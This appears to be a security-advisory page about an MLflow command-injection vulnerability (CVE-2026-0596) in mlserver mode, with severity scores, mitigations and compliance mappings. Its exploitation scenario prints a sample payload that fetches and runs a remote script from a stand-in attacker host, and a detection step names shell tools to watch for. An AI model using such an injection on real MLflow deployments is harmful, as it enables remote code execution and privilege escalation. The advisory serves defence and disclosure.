AI Threat Alert

CVE-2026-0596: MLflow: command injection via model_uri in mlserver mode

GHSA-rvhj-8chj-8v3c CRITICAL CISA: ATTEND
Published March 31, 2026
CISO Take

MLflow deployments using `enable_mlserver=True` are vulnerable to OS command injection through unsanitized model URIs passed to `bash -c`. Any environment where lower-privileged users can write to model directories and a higher-privileged service serves those models is exposed to privilege escalation. Immediately audit MLflow serving configurations and disable mlserver mode unless strictly required, pending patch availability.

What is the risk?

HIGH risk in multi-user or shared MLOps environments. CWE-78 command injection is a well-understood, trivially exploitable class when the attack vector is accessible. The privilege escalation path elevates this beyond a standard code execution vuln — attackers can pivot from a low-privileged ML engineer account to the service account running MLflow. MLflow is heavily deployed in enterprise data science platforms, often with broad network access to model registries and downstream inference systems. No CVSS score is assigned yet, but the exploitability profile mirrors CVSS 9.x class vulnerabilities.

What systems are affected?

Package Ecosystem Vulnerable Range Patched
MLflow pip < 3.9.0 3.9.0
26.7K OpenSSF 5.4 655 dependents Pushed 2d ago 30% patched ~52d to patch Full package profile →
mflow pip < 3.9.0 3.9.0

How severe is it?

CVSS 3.1
9.6 / 10
EPSS
1.3%
chance of exploitation in 30 days
Higher than 67% of all CVEs
Source: EPSS v3 — FIRST.org
Exploitation Status
Exploit Available
Exploitation: MEDIUM
Sophistication
Trivial
Exploitation Confidence
medium
CISA SSVC: Public PoC
Composite signal derived from CISA KEV, VulnCheck KEV, CISA SSVC, EPSS, Metasploit, Exploit-DB, trickest/cve, Nuclei templates, and inthewild.io exploitation reports.

What is the attack surface?

AV AC PR UI S C I A
AV Adjacent
AC Low
PR None
UI None
S Changed
C High
I High
A High

What should I do?

6 steps

  1. PATCH

    Monitor MLflow GitHub and PyPI for a patched release; apply immediately when available.

  2. WORKAROUND

    Disable enable_mlserver=True in all model serving configurations unless operationally required.

  3. ACCESS CONTROL

    Restrict write permissions on model directories to trusted service accounts only — remove write access for human users and CI pipelines that don't need it.

  4. INPUT VALIDATION

    If enable_mlserver=True must remain enabled, implement an allowlist validator for model_uri values before they reach the shell invocation layer.

  5. DETECTION

    Alert on unexpected child processes spawned from MLflow serving processes (e.g., bash, sh, curl, wget, nc). Use EDR or auditd rules targeting the MLflow process tree.

  6. LEAST PRIVILEGE

    Ensure MLflow serving processes run as non-root with minimal filesystem permissions; review service account roles in Kubernetes deployments.

What does CISA's SSVC say?

Decision Attend
Exploitation poc
Automatable No
Technical Impact total

Source: CISA Vulnrichment (SSVC v2.0). Decision based on the CISA Coordinator decision tree.

How is it classified?

Code Execution Supply Chain Framework Inference AML.T0010.001 AML.T0049 AML.T0050 AML.T0072

Which compliance frameworks are affected?

This CVE is relevant to:

EU AI Act
Article 15 - Accuracy, robustness and cybersecurity Article 9 - Risk management system
ISO 42001
A.6.1.3 - Risk treatment for AI systems A.6.2.6 - Security of AI system processing environments
NIST AI RMF
GOVERN 6.1 - Policies and procedures are in place for AI risk MANAGE 2.4 - Residual risks and treatment approaches
OWASP LLM Top 10
LLM05:2025 - Supply Chain Vulnerabilities

Frequently Asked Questions

What is CVE-2026-0596?

MLflow deployments using `enable_mlserver=True` are vulnerable to OS command injection through unsanitized model URIs passed to `bash -c`. Any environment where lower-privileged users can write to model directories and a higher-privileged service serves those models is exposed to privilege escalation. Immediately audit MLflow serving configurations and disable mlserver mode unless strictly required, pending patch availability.

Is CVE-2026-0596 actively exploited?

No confirmed active exploitation of CVE-2026-0596 has been reported, but organizations should still patch proactively.

How to fix CVE-2026-0596?

1. PATCH: Monitor MLflow GitHub and PyPI for a patched release; apply immediately when available. 2. WORKAROUND: Disable `enable_mlserver=True` in all model serving configurations unless operationally required. 3. ACCESS CONTROL: Restrict write permissions on model directories to trusted service accounts only — remove write access for human users and CI pipelines that don't need it. 4. INPUT VALIDATION: If `enable_mlserver=True` must remain enabled, implement an allowlist validator for `model_uri` values before they reach the shell invocation layer. 5. DETECTION: Alert on unexpected child processes spawned from MLflow serving processes (e.g., bash, sh, curl, wget, nc). Use EDR or auditd rules targeting the MLflow process tree. 6. LEAST PRIVILEGE: Ensure MLflow serving processes run as non-root with minimal filesystem permissions; review service account roles in Kubernetes deployments.

What systems are affected by CVE-2026-0596?

This vulnerability affects the following AI/ML architecture patterns: model serving, MLOps platforms, training pipelines, CI/CD for ML.

What is the CVSS score for CVE-2026-0596?

CVE-2026-0596 has a CVSS v3.1 base score of 9.6 (CRITICAL). The EPSS exploitation probability is 1.33%.

What is the AI security impact?

Affected AI Architectures

model servingMLOps platformstraining pipelinesCI/CD for ML

MITRE ATLAS Techniques

AML.T0010.001 AI Software
AML.T0049 Exploit Public-Facing Application
AML.T0050 Command and Scripting Interpreter
AML.T0072 Reverse Shell

Compliance Controls Affected

EU AI Act: Article 15, Article 9
ISO 42001: A.6.1.3, A.6.2.6
NIST AI RMF: GOVERN 6.1, MANAGE 2.4
OWASP LLM Top 10: LLM05:2025

What are the technical details?

Original Advisory

A command injection vulnerability exists in mlflow/mlflow when serving a model with `enable_mlserver=True`. The `model_uri` is embedded directly into a shell command executed via `bash -c` without proper sanitization. If the `model_uri` contains shell metacharacters, such as `$()` or backticks, it allows for command substitution and execution of attacker-controlled commands. This vulnerability affects the latest version of mlflow/mlflow and can lead to privilege escalation if a higher-privileged service serves models from a directory writable by lower-privileged users.

Exploitation Scenario

An adversary with write access to a shared model artifact directory (e.g., a data scientist with legitimate credentials, or an attacker who has compromised a low-privileged CI/CD pipeline) uploads a model whose registered URI contains a shell metacharacter payload such as `$(curl http://attacker.com/shell.sh | bash)` or a backtick-wrapped command. When the higher-privileged MLflow model serving process starts and invokes `bash -c` with the unsanitized URI, the injected command executes at the service's privilege level. The attacker establishes persistence, exfiltrates model artifacts, or pivots laterally within the ML infrastructure — all without ever exploiting a network-facing vulnerability directly.

Weaknesses (CWE)

CWE-78 Improper Neutralization of Special Elements used in an OS Command ('OS Command Injection') Primary CWE-78 Improper Neutralization of Special Elements used in an OS Command ('OS Command Injection') Primary

CWE-78 — Improper Neutralization of Special Elements used in an OS Command ('OS Command Injection'): The product constructs all or part of an OS command using externally-influenced input from an upstream component, but it does not neutralize or incorrectly neutralizes special elements that could modify the intended OS command when it is sent to a downstream component.

  • [Architecture and Design] If at all possible, use library calls rather than external processes to recreate the desired functionality.
  • [Architecture and Design, Operation] Run the code in a "jail" or similar sandbox environment that enforces strict boundaries between the process and the operating system. This may effectively restrict which files can be accessed in a particular directory or which commands can be executed by the software. OS-level examples include the Unix chroot jail, AppArmor, and SELinux. In general, managed code may provide some protection. For example, java.io.FilePermission in the Java SecurityManager allows the software to specify restrictions on file operations. This may not be a feasible solution, and it only limits the impact to the operating system; the rest of the application may still be subject to compromise. Be careful to avoid CWE-243 and other weaknesses related to jails.

Source: MITRE CWE corpus.

CVSS Vector

CVSS:3.0/AV:A/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H

References

Timeline

Published
March 31, 2026
Last Modified
May 20, 2026
First Seen
March 31, 2026

Related Vulnerabilities

CRITICAL CVE-2025-15379 10.0

MLflow: RCE via unsanitized model dependency specs

Same package: mlflow
CRITICAL CVE-2023-3765 10.0

MLflow: path traversal allows arbitrary file read

Same package: mlflow
CRITICAL CVE-2026-2635 9.8

mlflow: security flaw enables exploitation

Same package: mlflow
CRITICAL CVE-2023-1177 9.8

MLflow: path traversal allows arbitrary file read/write

Same package: mlflow
CRITICAL CVE-2023-2780 9.8

MLflow: path traversal allows arbitrary file read/write

Same package: mlflow
Back to Threat Feed